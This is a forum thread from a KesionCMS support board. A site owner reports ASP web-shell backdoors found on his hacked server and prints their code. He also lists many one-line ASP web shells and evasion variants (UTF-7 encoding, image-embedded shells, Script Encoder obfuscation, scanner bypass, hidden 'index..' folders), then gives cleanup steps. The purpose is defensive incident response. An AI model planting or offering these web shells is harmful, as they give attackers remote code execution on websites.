账号通
    

账号  

密码  

1550

查看

5

回复
主题:发现几个文件 [收藏主题] 转到:  
dcexin 当前离线

32

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:481 分
登录次数:32 次
注册时间:2009/4/8
最后登录:2009/12/31
dcexin 发表于:2009/10/2 12:01:00   | 显示全部帖子 查看该作者主题 楼主 

根据中马时间搜索出下列可疑文件及代码:

bottum.asp

1、<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
2、ms.Language="VBScript"
3、ms.AddObject "Response", Response
4、ms.AddObject "request", request
5、ms.AddObject "session", session
6、ms.AddObject "server", server
7、ms.AddObject "application", application
8、ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>
COON.asp

<%ExecuteGlobal request(chr(35))%>
mian.asp

<%ExecuteGlobal request(chr(35))%>

包含同类型语句的文件很多,同时存在不同的目录,伪装的也很巧妙。

index.asp

289582993.asp

要清干净的话,每个目录看下文件的更新时间。

而且极有可能植入系统。

 

以下是一句话木马代码及时间,

如果下次攻击的话,极有可能更换成下面未标明时间的木马代码或其他变形:

  <%execute request("#")%>  9月15日

  <%execute request(chr(35))%>  9月30日

  <script language=VBScript runat=server>if request(chr(35))<>"""" then

  ExecuteGlobal request(chr(35))

  </script>

  <%ExecuteGlobal request(chr(35))%> 9月30日

  <%eval request("#")%>

  以上都是正常的SHELL,下面几个是变形,或者是用来免杀的

  数据库里插入

  ┼攠数畣整爠焕敌瑳∨∣┩忾

  utf-7的马

  <%@ codepage=65000%>

  <% response.Charset="936"%>

  <%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

  用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的

  要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了

  <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

  ms.Language="VBScript"

  ms.AddObject "Response", Response

  ms.AddObject "request", request

  ms.AddObject "session", session

  ms.AddObject "server", server

  ms.AddObject "application", application

  ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

  Script Encoder 加密  9月30日

  <%@ LANGUAGE = VBScript.Encode %>

  <%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

  另外还一个另类的,利用windows的目录漏洞,建立..\目录里面放一句话,

  Set fso=Server.CreateObject("Scripting.FileSystemObject")

  path=server.mappath("/")

  Set f = fso.CreateFolder(path&"\index..\")

  Set a = fso.CreateTextFile(path&"\index..\1.asp", True)

  a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"

  a.WriteLine"response.clear"

  a.WriteLine"Execute request(chr(35))"

  a.WriteLine"response.end"

  a.WriteLine"end if"

  a.WriteLine"</script>"

  一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的.


所以,用UltraEdit替换模板,图片目录的还是根据时间排查。系统删掉从新设置登陆口令,关闭会员注册,上传功能,删掉admin/ks.template.asp和admin/upfilesave.asp文件,这是暂时的方法了。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
dcexin 当前离线

32

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:481 分
登录次数:32 次
注册时间:2009/4/8
最后登录:2009/12/31
dcexin 发表于:2009/10/2 13:57:00   | 显示全部帖子 查看该作者主题 沙发 
科汛在线网校系统

数据库里没有,

直接根据时间删除

我是9月29日中的,那这几天的可疑的图片都可以全删掉,系统重新解压,

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.06250秒 powered by KesionCMS 9.0